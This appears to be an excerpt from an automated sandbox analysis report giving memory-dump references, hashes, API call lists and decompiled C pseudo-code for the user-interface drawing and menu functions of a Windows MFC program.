Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #5785$#1640#323#470#5791#640#755CapsCompatibleCreateDeviceH_prologPaletteRealizeRectWindow
String ID: cbw
API String ID: 1885752197-4167342517
Opcode ID: 4d3b5cf71b303f060b8ac8370d5f5980091f29be10c7262a5770b915400515cc
Instruction ID: 982a31cf2f624f53cf94181ef0078a0459bd82ac1ead66a3c5ab922d543551f0
Opcode Fuzzy Hash: 4d3b5cf71b303f060b8ac8370d5f5980091f29be10c7262a5770b915400515cc
Instruction Fuzzy Hash: AA3174B1A00169AFDB14DFA5EC85DFEBB78FF44308F51412AE512A3151DB38AD45CB24

Uniqueness

Uniqueness Score: -1.00%

Function 00422273, Relevance: 24.2, APIs: 16, Instructions: 177
windowCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E00422273(intOrPtr __ecx, void* __eflags) {
				intOrPtr _t81;
				struct HBRUSH__* _t84;
				struct tagRECT _t100;
				struct HBRUSH__* _t103;
				struct HICON__* _t108;
				signed int _t109;
				void* _t110;
				intOrPtr _t114;
				signed int _t124;
				struct tagSIZE _t126;
				void* _t127;
				intOrPtr _t143;
				struct tagSIZE* _t148;
				signed int _t150;
				intOrPtr _t153;
				struct tagRECT _t154;
				intOrPtr _t155;
				void* _t157;

				L004269E6();
				_t153 =  *((intOrPtr*)(_t157 + 0x14));
				 *((intOrPtr*)(_t157 - 0x10)) = __ecx;
				_push(_t157 - 0x14);
				L004014F6(_t153);
				_t150 =  *(_t157 + 8);
				 *(_t157 - 4) =  *(_t157 - 4) & 0x00000000;
				_t148 = _t157 - 0x24;
				GetTextExtentPoint32A( *(_t150 + 8),  *(_t157 - 0x14),  *( *(_t157 - 0x14) - 8), _t148);
				_t126 =  *(_t157 - 0x24);
				 *(_t157 - 0x1c) = _t126;
				_t127 = _t126 + 4;
				if(_t127 > 0xc8) {
					_t127 = 0xc8;
				}
				 *(_t157 + 8) =  *(_t157 + 8) & 0x00000000;
				if( *((intOrPtr*)(_t153 + 0x20)) != 0) {
					_t124 = 0x12;
					 *(_t157 + 8) = _t124;
					_t127 = _t127 + _t124;
				}
				_t154 =  *(_t157 + 0xc);
				_t81 = _t127 + 6;
				 *((intOrPtr*)(_t157 - 0x18)) = _t81;
				 *((intOrPtr*)(_t157 - 0x2c)) = _t81 + _t154;
				_t84 =  *((intOrPtr*)(_t157 - 0x10)) + 0x40;
				 *(_t157 - 0x34) = _t154;
				 *(_t157 - 0x30) = 6;
				 *((intOrPtr*)(_t157 - 0x28)) = 0x1a;
				if(_t84 != 0) {
					_t84 =  *(_t84 + 4);
				}
				FrameRect( *(_t150 + 4), _t157 - 0x34, _t84);
				_push( *((intOrPtr*)(_t157 - 0x10)) + 0x50);
				L00426636();
				_push(7);
				_push(_t154 + 1);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(0x19);
				_push(_t154 + 1);
				L004266EA();
				_push(7);
				_push(_t154 + 1);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(7);
				_push(_t127 + _t154 + 4);
				L004266EA();
				_push( *((intOrPtr*)(_t157 - 0x10)) + 0x70);
				L00426636();
				_push(7);
				_push(_t127 + _t154 + 4);
				_push(_t157 - 0x2c);
				L004266F0();
				_push(0x19);
				_push(_t127 + _t154 + 4);
				L004266EA();
				_t100 = _t154 + 2;
				 *(_t157 - 0x30) = 8;
				 *(_t157 - 0x34) = _t100;
				 *((intOrPtr*)(_t157 - 0x28)) = 0x19;
				 *((intOrPtr*)(_t157 - 0x2c)) = _t127 + _t100 + 2;
				_t103 =  *((intOrPtr*)(_t157 - 0x10)) + 0x48;
				if(_t103 != 0) {
					_t103 =  *(_t103 + 4);
				}
				FillRect( *(_t150 + 4), _t157 - 0x34, _t103);
				_push(GetSysColor(0xf));
				_push(0);
				_push( *((intOrPtr*)(_t157 - 0x18)));
				_push(6);
				_push(_t154);
				L0042671A();
				_t108 =  *( *((intOrPtr*)(_t157 + 0x14)) + 0x20);
				if(_t108 != 0) {
					DrawIconEx( *(_t150 + 4), _t154 + 4, 8, _t108, 0x10, 0x10, 0, 0, 3);
				}
				_t109 =  *(_t157 + 8);
				_t143 =  *((intOrPtr*)(_t157 - 0x20));
				_t61 = _t154 + 3; // 0x3
				_t155 = _t109 + _t61;
				_t110 = 0x14;
				asm("cdq");
				 *((intOrPtr*)(_t157 - 0x44)) = _t155;
				_t114 = (_t110 - _t143 - _t148 >> 1) + 7;
				 *((intOrPtr*)(_t157 - 0x3c)) = _t127 - _t109 + _t155;
				 *((intOrPtr*)(_t157 - 0x40)) = _t114;
				 *((intOrPtr*)(_t157 - 0x38)) = _t114 + _t143;
				L00401BC7( *((intOrPtr*)(_t157 + 0x14)),  *((intOrPtr*)(_t157 - 0x10)) + 0x80);
				E004011B8( *((intOrPtr*)(_t157 + 0x14)), _t157 - 0x44);
				 *(_t157 - 4) =  *(_t157 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t157 - 0xc));
				return  *((intOrPtr*)(_t157 - 0x18));
			}

APIs

_EH_prolog.MSVCRT ref: 00422278
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 004222AA
FrameRect.USER32 ref: 0042230A
#5787.MFC42(?), ref: 00422319
#4297.MFC42(?,?,00000007,?), ref: 0042232A
#4133.MFC42(?,00000019,?,?,00000007,?), ref: 00422337
#4297.MFC42(?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422348
#4133.MFC42(00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422356
#5787.MFC42(?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422364
#4297.MFC42(?,00000000,00000007,?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007,?), ref: 00422376
#4133.MFC42(00000000,00000019,?,00000000,00000007,?,00000000,00000007,?,?,00000007,?,00000019,?,?,00000007), ref: 00422384
FillRect.USER32 ref: 004223B9
GetSysColor.USER32(0000000F), ref: 004223C1
#2753.MFC42(?,00000006,?,00000000,00000000), ref: 004223D2
DrawIconEx.USER32 ref: 004223F5

Part of subcall function 004011B8: #4299.MFC42(?,?,?,?,00000001), ref: 00421529

#800.MFC42(?,?,00000006,?,00000000,00000000), ref: 00422448

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #4133#4297$#5787Rect$#2753#4299#800ColorDrawExtentFillFrameH_prologIconPoint32Text
String ID:
API String ID: 734410698-0
Opcode ID: eda649fb14754aa2be2ef817309c05a2a4859fe9a2355fe48872231775094fe8
Instruction ID: bd7d8a367fa3d5fc488c4ac0d84a6ed313556999964a1771a1357e80a994385d
Opcode Fuzzy Hash: eda649fb14754aa2be2ef817309c05a2a4859fe9a2355fe48872231775094fe8
Instruction Fuzzy Hash: 48615DB1A00219AFDB10DFA4DD85FEEB7B9BB48304F44402AF915E7281D778E9058B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401564, Relevance: 24.1, APIs: 16, Instructions: 100
windowCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00401564(void* __ecx) {
				int _t37;
				struct HDC__* _t38;
				int _t42;
				struct HBRUSH__* _t43;
				intOrPtr* _t47;
				intOrPtr _t48;
				signed int _t57;
				void* _t75;
				void* _t77;
				struct HDC__* _t78;
				void* _t80;

				L004269E6();
				_t75 = __ecx;
				L00425FD6();
				_t37 = SendMessageA( *(__ecx + 0x20), 0x1004, 0, 0);
				if(_t37 == 0) {
					_t38 = GetDC( *(_t75 + 0x20));
					L00425FD0();
					_t78 = _t38;
					 *((intOrPtr*)(_t80 - 0x14)) =  *((intOrPtr*)(_t78->i + 0x24))(_t38, _t77);
					_t42 = GetClientRect( *(_t75 + 0x20), _t80 - 0x34);
					L00425FCA();
					if(_t42 != 0) {
						SendMessageA( *(_t42 + 0x20), 0x1207, 0, _t80 - 0x24);
						 *((intOrPtr*)(_t80 - 0x30)) =  *((intOrPtr*)(_t80 - 0x30)) +  *((intOrPtr*)(_t80 - 0x18));
					}
					_t43 = GetSysColor(5);
					_push(_t43);
					L00425FC4();
					if(_t43 != 0) {
						_t43 =  *(_t43 + 4);
					}
					FillRect( *(_t78 + 4), _t80 - 0x34, _t43);
					 *((intOrPtr*)(_t80 - 0x1c)) = 0x42c514;
					 *(_t80 - 4) =  *(_t80 - 4) & 0x00000000;
					L00425FA6();
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					_t57 = 1;
					L00425FBE();
					_t47 =  *((intOrPtr*)(_t78->i + 0x2c))(0xc, _t57);
					L00425FB8();
					_t48 =  *_t47;
					 *(_t80 - 4) = _t57;
					 *((intOrPtr*)(_t78->i + 0x70))(_t48,  *((intOrPtr*)(_t48 - 8)), _t80 - 0x34, 0x935, 0x8066);
					 *(_t80 - 4) =  *(_t80 - 4) | 0xffffffff;
					L00425DFC();
					 *((intOrPtr*)(_t78->i + 0x28))( *((intOrPtr*)(_t80 - 0x14)));
					_t37 = ReleaseDC( *(_t75 + 0x20),  *(_t78 + 4));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t80 - 0xc));
				return _t37;
			}

APIs

_EH_prolog.MSVCRT ref: 0040991F
#2379.MFC42 ref: 0040992B
SendMessageA.USER32 ref: 00409942
GetDC.USER32(?), ref: 00409950
#2859.MFC42(00000000), ref: 00409957
GetClientRect.USER32 ref: 0040996F
#6696.MFC42 ref: 00409977
SendMessageA.USER32 ref: 0040998E
GetSysColor.USER32(00000005), ref: 00409998
#283.MFC42(00000000), ref: 004099A2
FillRect.USER32 ref: 004099B6
#2414.MFC42 ref: 004099CA
#5875.MFC42(00000001), ref: 004099D9
#537.MFC42(00008066), ref: 004099EF
#800.MFC42 ref: 00409A15
ReleaseDC.USER32 ref: 00409A2A

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageRectSend$#2379#2414#283#2859#537#5875#6696#800ClientColorFillH_prologRelease
String ID:
API String ID: 2411248202-0
Opcode ID: c9a4aaa7591ea7164f80679881a354df9e6ea51f771ca0ecc83786f441ce0a2b
Instruction ID: a15132f754b8294fd7113b327c9f268ae83e73d8a896c85b42764a1a0129dbc1
Opcode Fuzzy Hash: c9a4aaa7591ea7164f80679881a354df9e6ea51f771ca0ecc83786f441ce0a2b
Instruction Fuzzy Hash: 44319C71A00615AFDB14EBA4DD49EAEB7B5FF48310F10022AF142A72E1DB749D00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040221B, Relevance: 24.1, APIs: 16, Instructions: 90
windowCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0040221B(void* __ecx) {
				intOrPtr _t43;
				intOrPtr _t47;
				intOrPtr _t51;
				int _t54;
				signed int _t60;
				void* _t79;
				void* _t81;

				L004269E6();
				_t79 = __ecx;
				L00425E08();
				 *(_t81 - 4) =  *(_t81 - 4) & 0x00000000;
				_t60 = 8;
				_push(0x8053);
				memset(_t81 - 0x30, 0, _t60 << 2);
				 *(_t81 - 0x30) = 4;
				L00425E02();
				_t43 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t43);
				 *((intOrPtr*)(_t81 - 0x20)) = _t43;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t43;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 0, _t81 - 0x30);
				_push(0x8062);
				L00425E02();
				_t47 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t47);
				 *((intOrPtr*)(_t81 - 0x20)) = _t47;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t47;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 1, _t81 - 0x30);
				_push(0x8054);
				L00425E02();
				_t51 =  *((intOrPtr*)( *((intOrPtr*)(_t81 - 0x10)) - 8));
				_push(_t51);
				 *((intOrPtr*)(_t81 - 0x20)) = _t51;
				L0042601E();
				_push(0xffffffff);
				 *((intOrPtr*)(_t81 - 0x24)) = _t51;
				L00426018();
				SendMessageA( *(_t79 + 0x20), 0x101a, 2, _t81 - 0x30);
				_t54 = InvalidateRect( *(_t79 + 0x20), 0, 1);
				 *(_t81 - 4) =  *(_t81 - 4) | 0xffffffff;
				L00425DFC();
				 *[fs:0x0] =  *((intOrPtr*)(_t81 - 0xc));
				return _t54;
			}

APIs

_EH_prolog.MSVCRT ref: 00408CC6
#540.MFC42 ref: 00408CD6
#4160.MFC42(00008053), ref: 00408CF8
#2915.MFC42(?,00008053), ref: 00408D0A
#5572.MFC42(000000FF,?,00008053), ref: 00408D17
SendMessageA.USER32 ref: 00408D31
#4160.MFC42(00008062), ref: 00408D3B
#2915.MFC42(?,00008062), ref: 00408D4D
#5572.MFC42(000000FF,?,00008062), ref: 00408D5A
SendMessageA.USER32 ref: 00408D69
#4160.MFC42(00008054), ref: 00408D73
#2915.MFC42(?,00008054), ref: 00408D85
#5572.MFC42(000000FF,?,00008054), ref: 00408D92
SendMessageA.USER32 ref: 00408DA1
InvalidateRect.USER32(?,00000000,00000001), ref: 00408DAA
#800.MFC42 ref: 00408DB7

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2915#4160#5572MessageSend$#540#800H_prologInvalidateRect
String ID:
API String ID: 48214485-0
Opcode ID: 83f40467a351e36a4b5567928c4167afad32651e6ad344e3093d4734eb5e8c9b
Instruction ID: 49dc5990a1624752f263415201f855bb670c0a61d3516ceea62fc7a3aebcebe9
Opcode Fuzzy Hash: 83f40467a351e36a4b5567928c4167afad32651e6ad344e3093d4734eb5e8c9b
Instruction Fuzzy Hash: C5315EB1A10229AFDB10EFA4DC46EEEB3B4FB08314F40091AF161B31E1EB746904DB18

Uniqueness

Uniqueness Score: -1.00%

Function 0041E67B, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041E67B(intOrPtr* __ecx, int _a4) {
				struct HDC__* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				struct tagTEXTMETRICA _v80;
				struct HDC__* _t68;
				signed int _t70;
				signed int _t74;
				signed int _t91;
				signed int _t93;
				intOrPtr _t95;
				int _t97;
				signed int _t110;
				intOrPtr* _t122;

				_t122 = __ecx;
				_push(0);
				_push( &_v24);
				_push(0);
				L00426114();
				_t68 = GetDC( *( *__ecx + 0x20));
				_push(_t68);
				L00425FD0();
				_v8 = _t68;
				if(_t68 != 0) {
					GetTextMetricsA( *(_t68 + 8),  &_v80);
					_t97 = _a4;
					_t70 = GetDeviceCaps( *(_t97 + 8), 8);
					asm("cdq");
					 *(_t122 + 0x40) = _t70 / ((_v80.tmAveCharWidth + _v80.tmAveCharWidth * 2 << 2) - _v24 + _v16);
					_a4 = GetDeviceCaps( *(_t97 + 8), 0x5a);
					_t74 = GetDeviceCaps( *(_v8 + 8), 0x5a);
					asm("cdq");
					 *(_t122 + 0x44) = _a4 / _t74;
					ReleaseDC( *( *_t122 + 0x20),  *(_v8 + 4));
					_a4 = GetDeviceCaps( *(_t97 + 8), 0xa);
					SetRect(_t122 + 0x20, 0, 0, GetDeviceCaps( *(_t97 + 8), 8), _a4);
					_t110 = _v80.tmAveCharWidth;
					 *(_t122 + 0x2c) =  *(_t122 + 0x2c) /  *(_t122 + 0x44);
					 *(_t122 + 0x20) = _t110 << 2;
					 *(_t122 + 0x28) =  *(_t122 + 0x28) /  *(_t122 + 0x40) - (_t110 << 3);
					_t91 = _v12 - _v20;
					 *(_t122 + 0x30) = _t91;
					_a4 = _t91 *  *(_t122 + 0x44);
					_t93 = GetDeviceCaps( *(_t97 + 8), 0xa);
					asm("cdq");
					_t95 = _t93 / _a4 - 7;
					 *((intOrPtr*)(_t122 + 0x34)) = _t95;
					return _t95;
				}
				return _t68;
			}

APIs

#3293.MFC42(00000000,?,00000000), ref: 0041E68E
GetDC.USER32(?), ref: 0041E698
#2859.MFC42(00000000), ref: 0041E69F
GetTextMetricsA.GDI32(?,?), ref: 0041E6B8
GetDeviceCaps.GDI32(?,00000008), ref: 0041E6CC
GetDeviceCaps.GDI32(?,0000005A), ref: 0041E6E8
GetDeviceCaps.GDI32(?,0000005A), ref: 0041E6F5
ReleaseDC.USER32 ref: 0041E70D
GetDeviceCaps.GDI32(?,0000000A), ref: 0041E718
GetDeviceCaps.GDI32(?,00000008), ref: 0041E722
SetRect.USER32 ref: 0041E730
GetDeviceCaps.GDI32(?,?), ref: 0041E773

Strings

cbw, xrefs: 0041E6C1

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: CapsDevice$#2859#3293MetricsRectReleaseText
String ID: cbw
API String ID: 131969298-4167342517
Opcode ID: cbd26ca350c02e425b3c77559175e03b7b7afcb298512a1be14116897e63f423
Instruction ID: 236ed24cbcb7c8f7216e1196d6defd9d4b8508f34d1c82560fec07fd9ed88f9e
Opcode Fuzzy Hash: cbd26ca350c02e425b3c77559175e03b7b7afcb298512a1be14116897e63f423
Instruction Fuzzy Hash: A8314A71600604AFDB14DFA8CD85E9ABBF5FF88300F018529F94A9B6A0D771E941CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00422626, Relevance: 22.6, APIs: 15, Instructions: 98
COMMON

Download Yara Rule

C-Code - Quality: 36%

			E00422626(void* __ecx) {
				struct tagRECT* _v0;
				intOrPtr _v4;
				struct HWND__* _t17;
				long _t27;
				intOrPtr _t39;
				void* _t47;
				intOrPtr _t49;
				struct tagRECT* _t50;
				struct tagRECT* _t52;

				_t47 = __ecx;
				_t17 = GetParent( *(__ecx + 0x20));
				_push(_t17);
				L00426372();
				_t49 =  *((intOrPtr*)(_t47 + 0x9c));
				if(_t49 == 0) {
					_push(__imp__#1842);
					L004264F2();
					_t50 = _v0;
					_t39 = _v4;
					if(_t17 != 0) {
						DrawEdge( *(_t39 + 4), _t50, 6, 2);
					}
					_push(GetSysColor(0x14));
					_push(GetSysColor(0x10));
					_push(_t50->bottom - 0x1e);
					_push(_t50->right);
					_push(0x1e);
					_push(0);
					L00426906();
					_push(GetSysColor(0x16));
					_push(0);
					_push(_t50->bottom - 0x20);
					_t27 = _t50->right;
					_push(_t27);
					_push(0x1f);
					L8:
					_push(1);
					L00426906();
					return _t27;
				}
				if(_t49 == 1) {
					_push(__imp__#1842);
					L004264F2();
					_t52 = _v0;
					_t39 = _v4;
					if(_t17 != 0) {
						DrawEdge( *(_t39 + 4), _t52, 6, 8);
					}
					_push(GetSysColor(0x14));
					_push(GetSysColor(0x10));
					_push(_t52->bottom - 0x1d);
					_push(_t52->right);
					_push(0);
					_push(0);
					L00426906();
					_push(GetSysColor(0x16));
					_push(0);
					_push(_t52->bottom - 0x1f);
					_t27 = _t52->right;
					_push(_t27);
					_push(1);
					goto L8;
				}
				return _t17;
			}

APIs

GetParent.USER32(?), ref: 0042262E
#2864.MFC42(00000000), ref: 00422635
#4083.MFC42(00000000), ref: 00422654
DrawEdge.USER32(?,?,00000006,00000008), ref: 0042266D
GetSysColor.USER32(00000014), ref: 0042267B
GetSysColor.USER32(00000010), ref: 00422680
#2566.MFC42(00000000,00000000,?,?,00000000), ref: 00422693
GetSysColor.USER32(00000016), ref: 0042269A
#4083.MFC42(00000000), ref: 004226B6
DrawEdge.USER32(?,?,00000006,00000002), ref: 004226CF
GetSysColor.USER32(00000014), ref: 004226DD
GetSysColor.USER32(00000010), ref: 004226E2
#2566.MFC42(00000000,0000001E,?,?,00000000), ref: 004226F5
GetSysColor.USER32(00000016), ref: 004226FC
#2566.MFC42(00000001,0000001F,?,?,00000000,00000000), ref: 00422714

Memory Dump Source

Source File: 0000000A.00000002.511385390.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000A.00000002.511372912.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511466307.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511492835.0000000000434000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511544203.0000000000440000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511559569.0000000000443000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511575716.0000000000444000.00000004.00020000.sdmp Download File
Associated: 0000000A.00000002.511586263.0000000000446000.00000008.00020000.sdmp Download File
Associated: 0000000A.00000002.511611762.0000000000447000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511659732.0000000000466000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511668566.000000000046D000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511727266.000000000047E000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511764207.0000000000488000.00000002.00020000.sdmp Download File
Associated: 0000000A.00000002.511787115.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: Color$#2566$#4083DrawEdge$#2864Parent
String ID:
API String ID: 2792232749-0
Opcode ID: 525ef626595c81062ff291b8d8143be4fc661b9527e6a08dca739678f8d56de9
Instruction ID: 95a3676bf7e8de789e7bbfb8f7632d5fd2f4affc349cfe17065ab4213de9fcc2
Opcode Fuzzy Hash: 525ef626595c81062ff291b8d8143be4fc661b9527e6a08dca739678f8d56de9
Instruction Fuzzy Hash: BB31B6713403547FEA30AF69DC49F6B7798EB84710F014429FA85EB1E1CAA0AC409B28

Uniqueness

Uniqueness Score: -1.00%

Function 0041550D, Relevance: 21.1, APIs: 14, Instructions: 107
windowCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E0041550D(intOrPtr __ecx, void* __fp0) {
				struct HWND__* _t41;
				signed int _t42;
				int _t45;
				int _t46;
				intOrPtr _t70;
				intOrPtr _t73;
				int _t75;
				void* _t76;
				void* _t91;

				_t91 = __fp0;
				L004269E6();
				_t70 = __ecx;
				 *((intOrPtr*)(_t76 - 0x14)) = 0;
				L004262EE();
				 *(_t76 - 4) = 0;
				_t41 = L00401307();
				if(_t41 == 0) {
					_t41 = GetDesktopWindow();
					_push(_t41);
					L00426372();
				}
				_push(0xe800);
				_push(0x50002800);
				_push(_t41);
				L004266D8();
				_t42 =  *(_t76 + 8) & 0x0000ffff;
				_push(_t42);
				L00426336();
				if(_t42 == 0) {
					L13:
					 *(_t76 - 4) =  *(_t76 - 4) | 0xffffffff;
					L004262E2();
					 *[fs:0x0] =  *((intOrPtr*)(_t76 - 0xc));
					return  *((intOrPtr*)(_t76 - 0x14));
				}
				L00425F8E();
				_t73 = 1;
				 *(_t76 - 4) = 1;
				_push(_t73);
				_push(_t73);
				_push(0xff);
				_push( *0x440d0c);
				_push( *0x440d08);
				L00426000();
				_t45 = E00401140(_t70, _t91, _t76 - 0x20,  *(_t76 + 8));
				if(_t45 == 0) {
					L12:
					 *(_t76 - 4) = 0;
					L00425FB2();
					goto L13;
				}
				 *((intOrPtr*)(_t76 - 0x14)) = _t73;
				 *(_t76 + 8) = 0;
				if( *((intOrPtr*)(_t76 - 0x68)) <= 0) {
					goto L12;
				} else {
					goto L5;
				}
				do {
					L5:
					_push( *(_t76 + 8));
					L004266D2();
					 *(_t76 - 0x10) = _t45;
					if(_t45 != 0) {
						_t46 = GetMenuState( *(_t70 + 4), _t45, 0);
						if(_t46 != 0xffffffff) {
							_push( *(_t76 - 0x10));
							L004266CC();
							_t75 = _t46;
							if(_t75 >= 0) {
								_push(_t76 - 0x18);
								_push(_t76 - 0x24);
								_push(_t76 - 0x10);
								_push(_t75);
								L004266C6();
								if( *(_t76 - 0x18) > 0) {
									_t75 =  *(_t76 - 0x18);
								}
							}
							L00401D9D(_t70, 0,  *(_t76 - 0x10), _t76 - 0x20, _t75);
						}
					}
					 *(_t76 + 8) =  *(_t76 + 8) + 1;
					_t45 =  *(_t76 + 8);
				} while (_t45 <  *((intOrPtr*)(_t76 - 0x68)));
				goto L12;
			}

APIs

_EH_prolog.MSVCRT ref: 00415512
#554.MFC42 ref: 0041552C
GetDesktopWindow.USER32 ref: 0041553D
#2864.MFC42(00000000), ref: 00415544
#2120.MFC42(00000000,50002800,0000E800), ref: 0041555A
#4163.MFC42(?,00000000,50002800,0000E800), ref: 0041556A
#384.MFC42(?,?,00000000,50002800,0000E800), ref: 0041557B
#2096.MFC42(000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 0041559D
#3289.MFC42(?,000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 004155C8
GetMenuState.USER32 ref: 004155D9
#2012.MFC42(?,?,?,00000000,50002800,0000E800), ref: 004155ED
#2920.MFC42(00000000,?,?,?,?,?,?,00000000,50002800,0000E800), ref: 0041560B
#686.MFC42(000000FF,00000001,00000001,?,?,00000000,50002800,0000E800), ref: 00415639
#807.MFC42(?,00000000,50002800,0000E800), ref: 00415649

Memory Dump Source

